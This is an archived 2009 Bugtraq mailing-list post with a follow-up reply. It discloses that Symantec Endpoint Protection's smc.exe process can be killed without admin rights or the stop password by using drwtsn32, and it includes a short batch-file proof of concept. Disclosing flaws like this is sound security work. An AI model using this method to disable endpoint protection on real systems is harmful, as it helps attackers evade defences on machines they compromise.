| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 13 Feb 2009 19:03:20 +0530
From: "Sandeep Cheema" <51l3n7@...e.in>
To: <bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
As an update its not happening for "Users" account, Though no access denied.
Anyone knows why?
Thank you.
Regards, Sandeep
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@...e.in>
Sent: Friday, February 13, 2009 6:18 PM
To: <bugtraq@...urityfocus.com>
Subject: SEPKILL /im SMC.EXE /f
> Hi,
>
> Probably this bug exists on majorly all the software's but security
> software's like antivirus and firewall have to bucket it which is not what
> its for SEP.
> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and
> 2k3)
>
>
> You can kill smc.exe with the help of drwtsn32.exe in the following way.
>
> drwtsn32 -p %pid%
> where pid is the process id for smc.exe
>
> POC:
>
> Save the following as a batch file and execute it
>
> tasklist | find /i "Smc.exe" > c:\pid.txt
> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
> drwtsn32 -p %pidopt%
>
>
>
> You don't need admin privilege for this exploit.
>
> This will even bypass the password if it has been set to stop the service.
> If executed from the command line in the form drwtsn32 -p %pid% , the
> command will be executed and it takes some time for the process to be
> stopped.
> If done from a batch file the command is completed only when the process
> is stopped.
>
> Regards, Sandeep
> 51l3n7[at]live.in
>
>
>
Powered by blists - more mailing lists